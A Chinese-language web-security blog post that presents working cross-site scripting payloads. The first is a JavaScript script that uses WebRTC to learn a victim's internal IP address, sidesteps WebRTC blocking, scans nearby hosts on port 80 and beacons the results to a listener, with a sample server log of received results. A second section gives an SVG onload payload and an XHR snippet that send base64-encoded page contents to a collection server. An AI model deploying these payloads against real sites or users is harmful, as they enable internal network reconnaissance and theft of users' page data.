XSS的高级攻击用法

XSS的一些其他用法

攻击客户端,获取内网ip,并扫描内网端口

xss.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
//数据传回
var TagName = document.getElementsByTagName("body")[0];
function post_data(ip,port){
    var img = document.createElement("img");
    img.setAttribute("src","http://127.0.0.1:8000/?ip=" + ip + "&openport=" + port);
    img.setAttribute("style","display:none")
    TagName.appendChild(img);
    }

function getIPs(callback){
    var ip_dups = {};
    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var useWebKit = !!window.webkitRTCPeerConnection;
    //bypass naive webrtc blocking
    if(!RTCPeerConnection){
        //create an iframe node
        var iframe = document.createElement('iframe');
        iframe.style.display = 'none';
        //invalidate content script
        iframe.sandbox = 'allow-same-origin';
        //insert a listener to cutoff any attempts to
        //disable webrtc when inserting to the DOM
        iframe.addEventListener("DOMNodeInserted", function(e){
            e.stopPropagation();
        }, false);
        iframe.addEventListener("DOMNodeInsertedIntoDocument", function(e){
            e.stopPropagation();
        }, false);
        //insert into the DOM and get that iframe's webrtc
        document.body.appendChild(iframe);
        var win = iframe.contentWindow;
        RTCPeerConnection = win.RTCPeerConnection
            || win.mozRTCPeerConnection
            || win.webkitRTCPeerConnection;
        useWebKit = !!win.webkitRTCPeerConnection;
    }
    //minimal requirements for data connection
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };
    //firefox already has a default stun server in about:config
    //    media.peerconnection.default_iceservers =
    //    [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;
    //add same stun server for chrome
    if(useWebKit)
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);
    function handleCandidate(candidate){
        //match just the IP address
        var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
        var ip_addr = ip_regex.exec(candidate)[1];
        //remove duplicates
        if(ip_dups[ip_addr] === undefined)
            callback(ip_addr);
        ip_dups[ip_addr] = true;
    }
    //listen for candidate events
    pc.onicecandidate = function(ice){
        //skip non-candidate events
        if(ice.candidate)
            handleCandidate(ice.candidate.candidate);
    };
    //create a bogus data channel
    pc.createDataChannel("");
    //create an offer sdp
    pc.createOffer(function(result){
        //trigger the stun server request
        pc.setLocalDescription(result, function(){}, function(){});
    }, function(){});
    //wait for a while to let everything done
    setTimeout(function(){
        //read candidate info from local description
        var lines = pc.localDescription.sdp.split('\n');
        lines.forEach(function(line){
            if(line.indexOf('a=candidate:') === 0)
                handleCandidate(line);
        });
    }, 1000);
}

//简单端口扫描
getIPs(function(ip){
    //判断内网IP
    if (ip.match(/^(192.168.|169.254.|10.|172.(1[6-9]|2d|3[01]))/)){
        //alert(ip);
        ip = ip.split(".");
        ip.pop();
        ip = ip.join(".");
        for(var i = 10;i<=20;i++){
            var script = document.createElement("script");
            var ip_url = ip + "." + i + ":80";//3306
            script.setAttribute("src","http://" + ip_url);
            script.setAttribute("onload","post_data('" + ip + "." + i + "','80')");//3306
            TagName.appendChild(script);
        }
    }
    else{
        //alert(ip);
    }
    });

xss.html

1
2
3
4
5
6
7
8
9
10
11
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">

    <title>Document</title>
</head>
<body>
</body>
<script type="text/javascript" src="xss_net.js"></script>
</html>

监听接收

1
2
3
4
5
可以使用 
python -m SimpleHTTPServer
- - [14/Aug/2019 16:15:16] "GET /?ip=10.13.101.18&openport=80 HTTP/1.1" 200 -
- - [14/Aug/2019 16:15:21] "GET /?ip=10.13.101.18&openport=80 HTTP/1.1" 200 -
- - [14/Aug/2019 16:36:20] "GET /?ip=10.13.101.18&openport=80 HTTP/1.1" 200 -

攻击客户端,获取用户页面内容(受到同源策略限制,只能访问同源页面)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// btoa 是js的base64函数 
//获取当前页面
<svg/onload="document.location='http://localhost:8000/?'+btoa(document.body.innerHTML)">  

//获取其他页面,配合ajax使用

xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
    if (xmlhttp.readyState==4 && xmlhttp.status==200)
    {
    	//发送数据到接收端
        document.write("<img src=\"http://localhost:8000/?"+ btoa(xmlhttp.responseText) + "\" />");
    }
}
xmlhttp.open("GET","test.php",true); //test.php 为请求页面
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send();

其他利用方式可参考XSS平台的配置
http://xssye.com/index.php?do=module

某CTF XSS+SSRF综合利用方式

https://www.anquanke.com/post/id/156377

web安全
  1. 攻击客户端,获取内网ip,并扫描内网端口
  2. 攻击客户端,获取用户页面内容(受到同源策略限制,只能访问同源页面)
  3. 某CTF XSS+SSRF综合利用方式
© 2019 热爱生活、热爱学习, Powered by Aloha and Hexo.